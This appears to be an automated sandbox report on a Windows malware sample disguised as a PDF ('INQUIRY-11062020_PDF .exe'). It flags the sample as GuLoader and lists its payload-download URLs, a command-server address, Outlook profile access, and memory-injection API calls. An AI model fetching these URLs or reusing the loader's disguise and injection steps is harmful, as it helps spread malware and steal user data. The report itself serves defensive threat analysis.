          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldt
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-139.crl0c
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-191.crl0c
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.starfieldtech.
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/08
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0;
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0F
          Source: INQUIRY-11062020_PDF .exeString found in binary or memory: http://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.bin
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.binhttp://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/0
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: https://web.opendrive.com/
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/NzhfMjExNTQ1MjJf?inline=1
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: https://web.opendrive.com/t
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tV
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tVi4_
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certs.starfieldtech.com/repository/1402
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldt
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-139.crl0c
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfig2s1-191.crl0c
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.starfieldtech.
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/08
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0;
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0F
          Source: INQUIRY-11062020_PDF .exeString found in binary or memory: http://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.bin
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.322853008.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.binhttp://od.lk/s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/0
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: https://web.opendrive.com/
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: https://web.opendrive.com/api/v1/download/file.json/NzhfMjExNTQ1MjJf?inline=1
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: https://web.opendrive.com/t
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728

          System Summary:

          barindex
          Potential malicious icon foundShow sources
          Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
          Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: INQUIRY-11062020_PDF .exe
          Source: initial sampleStatic PE information: Filename: INQUIRY-11062020_PDF .exe
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E9062 NtMapViewOfSection,0_2_020E9062
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8484 NtWriteVirtualMemory,0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8BA9 NtProtectVirtualMemory,0_2_020E8BA9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3801 NtWriteVirtualMemory,0_2_020E3801
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E942E NtMapViewOfSection,0_2_020E942E
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3648 NtWriteVirtualMemory,0_2_020E3648
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E906C NtMapViewOfSection,0_2_020E906C
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3E7A NtWriteVirtualMemory,0_2_020E3E7A
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E96F1 NtMapViewOfSection,0_2_020E96F1
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4315 NtWriteVirtualMemory,0_2_020E4315
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E954F NtMapViewOfSection,0_2_020E954F
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E7357 NtWriteVirtualMemory,0_2_020E7357
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E6F55 NtWriteVirtualMemory,0_2_020E6F55
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E9166 NtMapViewOfSection,0_2_020E9166
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4173 NtWriteVirtualMemory,0_2_020E4173
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8B81 NtProtectVirtualMemory,0_2_020E8B81
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E71FE NtWriteVirtualMemory,0_2_020E71FE
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E1FF9 NtWriteVirtualMemory,0_2_020E1FF9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E39F9 NtWriteVirtualMemory,0_2_020E39F9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E9062 NtMapViewOfSection,0_2_020E9062
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8484 NtWriteVirtualMemory,0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8BA9 NtProtectVirtualMemory,0_2_020E8BA9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3801 NtWriteVirtualMemory,0_2_020E3801
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E942E NtMapViewOfSection,0_2_020E942E
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3648 NtWriteVirtualMemory,0_2_020E3648
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E906C NtMapViewOfSection,0_2_020E906C
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3E7A NtWriteVirtualMemory,0_2_020E3E7A
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E96F1 NtMapViewOfSection,0_2_020E96F1
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4315 NtWriteVirtualMemory,0_2_020E4315
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E954F NtMapViewOfSection,0_2_020E954F
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E7357 NtWriteVirtualMemory,0_2_020E7357
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E6F55 NtWriteVirtualMemory,0_2_020E6F55
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E9166 NtMapViewOfSection,0_2_020E9166
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4173 NtWriteVirtualMemory,0_2_020E4173
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8B81 NtProtectVirtualMemory,0_2_020E8B81
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E71FE NtWriteVirtualMemory,0_2_020E71FE
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E1FF9 NtWriteVirtualMemory,0_2_020E1FF9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E39F9 NtWriteVirtualMemory,0_2_020E39F9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_005630D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,8_2_005630D1
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00562DED Sleep,TerminateThread,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,8_2_00562DED
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00562FA5 CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,8_2_00562FA5
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00568BA9 NtProtectVirtualMemory,LdrInitializeThunk,8_2_00568BA9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00563155 NtProtectVirtualMemory,8_2_00563155
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00564173 LdrInitializeThunk,NtProtectVirtualMemory,8_2_00564173
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00564127 LdrInitializeThunk,NtProtectVirtualMemory,8_2_00564127
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_005641C4 LdrInitializeThunk,NtProtectVirtualMemory,8_2_005641C4
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00568FC5 NtProtectVirtualMemory,8_2_00568FC5
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00568B81 NtProtectVirtualMemory,8_2_00568B81
          Source: INQUIRY-11062020_PDF .exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: INQUIRY-11062020_PDF .exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290031434.0000000000410000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290572831.00000000020B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327455582.000000001DEB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327480188.000000001E020000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000000.289029801.0000000000410000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exeBinary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290031434.0000000000410000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000000.00000002.290572831.00000000020B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327455582.000000001DEB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327480188.000000001E020000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000000.289029801.0000000000410000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
          Source: INQUIRY-11062020_PDF .exeBinary or memory string: OriginalFilenameCURVETTED.exe vs INQUIRY-11062020_PDF .exe
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@3/2@3/4
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
          Source: INQUIRY-11062020_PDF .exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: INQUIRY-11062020_PDF .exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: INQUIRY-11062020_PDF .exeVirustotal: Detection: 29%
          Source: INQUIRY-11062020_PDF .exeReversingLabs: Detection: 33%
          Source: INQUIRY-11062020_PDF .exeVirustotal: Detection: 29%
          Source: INQUIRY-11062020_PDF .exeReversingLabs: Detection: 33%
          Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe'
          Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe'
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe' Jump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe'
          Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe'
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess created: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe' Jump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

          Data Obfuscation:

          barindex
          Yara detected GuLoaderShow sources
          Source: Yara matchFile source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812, type: MEMORY
          Yara detected VB6 Downloader GenericShow sources
          Source: Yara matchFile source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812, type: MEMORY
          Source: INQUIRY-11062020_PDF .exeStatic PE information: real checksum: 0x1a5cb should be: 0x1da60
          Source: INQUIRY-11062020_PDF .exeStatic PE information: real checksum: 0x1a5cb should be: 0x1da60
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_00407B5A push ecx; ret 0_2_00407B6B
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_0040393D pushad ; retf 0_2_004039A3
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_004053F7 push eax; iretd 0_2_00405410
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E79D1 push ebp; retf 0_2_020E79D2
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_00407B5A push ecx; ret 0_2_00407B6B
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_0040393D pushad ; retf 0_2_004039A3
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_004053F7 push eax; iretd 0_2_00405410
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E79D1 push ebp; retf 0_2_020E79D2
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00565D64 push FFFFFFB9h; retf 8_2_00565D66
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_005679D1 push ebp; retf 8_2_005679D2
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
